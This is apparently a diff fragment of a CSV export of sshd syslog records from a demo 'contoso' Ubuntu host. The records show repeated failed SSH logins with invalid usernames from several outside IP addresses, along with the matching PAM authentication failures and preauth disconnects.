+6383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:32,UbuntuDevEnv,2019-06-26 16:54:32,auth,UbuntuDevEnv,info,Invalid user Rupesh from 74.94.246.82 port 34188,42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,74.94.246.8,34188,,
+6384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:32,UbuntuDevEnv,2019-06-26 16:54:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:32,UbuntuDevEnv,2019-06-26 16:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:35,UbuntuDevEnv,2019-06-26 16:54:34,auth,UbuntuDevEnv,info,Failed password for invalid user Rupesh from 74.94.246.82 port 34188 ssh2,42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,74.94.246.8,34188,,
+6387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:35,UbuntuDevEnv,2019-06-26 16:54:34,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 34188:11: Bye Bye [preauth],42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,34188,,
+6388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:35,UbuntuDevEnv,2019-06-26 16:54:34,auth,UbuntuDevEnv,info,Disconnected from invalid user Rupesh 74.94.246.82 port 34188 [preauth],42241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,74.94.246.8,34188,,
+6389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:39,UbuntuDevEnv,2019-06-26 16:54:39,auth,UbuntuDevEnv,info,Invalid user zao from 171.8.199.77 port 59960,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zao,171.8.199.7,59960,,
+6390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:39,UbuntuDevEnv,2019-06-26 16:54:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:39,UbuntuDevEnv,2019-06-26 16:54:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:42,UbuntuDevEnv,2019-06-26 16:54:41,auth,UbuntuDevEnv,info,Failed password for invalid user zao from 171.8.199.77 port 59960 ssh2,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zao,171.8.199.7,59960,,
+6393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:42,UbuntuDevEnv,2019-06-26 16:54:42,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 59960:11: Bye Bye [preauth],42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,59960,,
+6394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:42,UbuntuDevEnv,2019-06-26 16:54:42,auth,UbuntuDevEnv,info,Disconnected from invalid user zao 171.8.199.77 port 59960 [preauth],42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zao,171.8.199.7,59960,,
+6395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:51,UbuntuDevEnv,2019-06-26 16:54:51,auth,UbuntuDevEnv,info,Invalid user redis from 35.154.19.93 port 43434,42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,43434,,
+6396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:51,UbuntuDevEnv,2019-06-26 16:54:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:51,UbuntuDevEnv,2019-06-26 16:54:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:54,UbuntuDevEnv,2019-06-26 16:54:53,auth,UbuntuDevEnv,info,Failed password for invalid user redis from 35.154.19.93 port 43434 ssh2,42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,43434,,
+6399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:54,UbuntuDevEnv,2019-06-26 16:54:54,auth,UbuntuDevEnv,info,Disconnected from invalid user redis 35.154.19.93 port 43434 [preauth],42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,43434,,
+6400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:54,UbuntuDevEnv,2019-06-26 16:54:54,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 43434:11: Normal Shutdown, Thank you for playing [preauth]",42311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43434,,
+6401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:57,UbuntuDevEnv,2019-06-26 16:54:57,auth,UbuntuDevEnv,info,Invalid user dc from 81.0.212.18 port 58702,42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dc,81.0.212.1,58702,,
+6402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:57,UbuntuDevEnv,2019-06-26 16:54:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:57,UbuntuDevEnv,2019-06-26 16:54:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:59,UbuntuDevEnv,2019-06-26 16:54:58,auth,UbuntuDevEnv,info,Failed password for invalid user dc from 81.0.212.18 port 58702 ssh2,42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dc,81.0.212.1,58702,,
+6405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:59,UbuntuDevEnv,2019-06-26 16:54:58,auth,UbuntuDevEnv,info,Disconnected from invalid user dc 81.0.212.18 port 58702 [preauth],42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dc,81.0.212.1,58702,,
+6406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:59,UbuntuDevEnv,2019-06-26 16:54:58,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 58702:11: Bye Bye [preauth],42335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,58702,,
+6407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:12,UbuntuDevEnv,2019-06-26 16:55:11,auth,UbuntuDevEnv,info,Invalid user redis from 35.154.19.93 port 46726,42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,46726,,
+6408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:12,UbuntuDevEnv,2019-06-26 16:55:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:12,UbuntuDevEnv,2019-06-26 16:55:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:14,UbuntuDevEnv,2019-06-26 16:55:13,auth,UbuntuDevEnv,info,Failed password for invalid user redis from 35.154.19.93 port 46726 ssh2,42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,46726,,
+6411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:14,UbuntuDevEnv,2019-06-26 16:55:13,auth,UbuntuDevEnv,info,Disconnected from invalid user redis 35.154.19.93 port 46726 [preauth],42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redis,35.154.19.9,46726,,
+6412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:14,UbuntuDevEnv,2019-06-26 16:55:13,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 46726:11: Normal Shutdown, Thank you for playing [preauth]",42390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46726,,
+6413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:19,UbuntuDevEnv,2019-06-26 16:55:18,auth,UbuntuDevEnv,info,Invalid user chen from 35.154.19.93 port 50006,42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,50006,,
+6414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:19,UbuntuDevEnv,2019-06-26 16:55:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:19,UbuntuDevEnv,2019-06-26 16:55:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:20,UbuntuDevEnv,2019-06-26 16:55:20,auth,UbuntuDevEnv,info,Failed password for invalid user chen from 35.154.19.93 port 50006 ssh2,42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,50006,,
+6417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:21,UbuntuDevEnv,2019-06-26 16:55:20,auth,UbuntuDevEnv,info,Disconnected from invalid user chen 35.154.19.93 port 50006 [preauth],42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,50006,,
+6418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:21,UbuntuDevEnv,2019-06-26 16:55:20,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50006:11: Normal Shutdown, Thank you for playing [preauth]",42410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50006,,
+6419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:26,UbuntuDevEnv,2019-06-26 16:55:26,auth,UbuntuDevEnv,info,Invalid user chen from 35.154.19.93 port 53294,42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,53294,,
+6420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:26,UbuntuDevEnv,2019-06-26 16:55:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:26,UbuntuDevEnv,2019-06-26 16:55:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:28,UbuntuDevEnv,2019-06-26 16:55:28,auth,UbuntuDevEnv,info,Failed password for invalid user chen from 35.154.19.93 port 53294 ssh2,42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,53294,,
+6423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:29,UbuntuDevEnv,2019-06-26 16:55:28,auth,UbuntuDevEnv,info,Disconnected from invalid user chen 35.154.19.93 port 53294 [preauth],42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chen,35.154.19.9,53294,,
+6424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:29,UbuntuDevEnv,2019-06-26 16:55:28,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 53294:11: Normal Shutdown, Thank you for playing [preauth]",42448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53294,,
+6425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:33,UbuntuDevEnv,2019-06-26 16:55:33,auth,UbuntuDevEnv,info,Invalid user sonar from 35.154.19.93 port 56568,42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,56568,,
+6426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:33,UbuntuDevEnv,2019-06-26 16:55:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:33,UbuntuDevEnv,2019-06-26 16:55:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:36,UbuntuDevEnv,2019-06-26 16:55:36,auth,UbuntuDevEnv,info,Failed password for invalid user sonar from 35.154.19.93 port 56568 ssh2,42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,56568,,
+6429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:36,UbuntuDevEnv,2019-06-26 16:55:36,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 56568:11: Normal Shutdown, Thank you for playing [preauth]",42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56568,,
+6430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:36,UbuntuDevEnv,2019-06-26 16:55:36,auth,UbuntuDevEnv,info,Disconnected from invalid user sonar 35.154.19.93 port 56568 [preauth],42469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,56568,,
+6431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:40,UbuntuDevEnv,2019-06-26 16:55:40,auth,UbuntuDevEnv,info,Invalid user sonar from 35.154.19.93 port 59814,42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,59814,,
+6432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:40,UbuntuDevEnv,2019-06-26 16:55:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:40,UbuntuDevEnv,2019-06-26 16:55:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:42,UbuntuDevEnv,2019-06-26 16:55:42,auth,UbuntuDevEnv,info,Failed password for invalid user sonar from 35.154.19.93 port 59814 ssh2,42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,59814,,
+6435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:42,UbuntuDevEnv,2019-06-26 16:55:42,auth,UbuntuDevEnv,info,Disconnected from invalid user sonar 35.154.19.93 port 59814 [preauth],42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sonar,35.154.19.9,59814,,
+6436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:42,UbuntuDevEnv,2019-06-26 16:55:42,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 59814:11: Normal Shutdown, Thank you for playing [preauth]",42493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59814,,
+6437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:52,UbuntuDevEnv,2019-06-26 16:55:52,auth,UbuntuDevEnv,info,Invalid user uftp from 35.154.19.93 port 34868,42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,34868,,
+6438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:52,UbuntuDevEnv,2019-06-26 16:55:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:52,UbuntuDevEnv,2019-06-26 16:55:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:55,UbuntuDevEnv,2019-06-26 16:55:54,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 35.154.19.93 port 34868 ssh2,42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,34868,,
+6441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:55,UbuntuDevEnv,2019-06-26 16:55:54,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 34868:11: Normal Shutdown, Thank you for playing [preauth]",42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34868,,
+6442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:55:55,UbuntuDevEnv,2019-06-26 16:55:54,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 35.154.19.93 port 34868 [preauth],42538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,35.154.19.9,34868,,
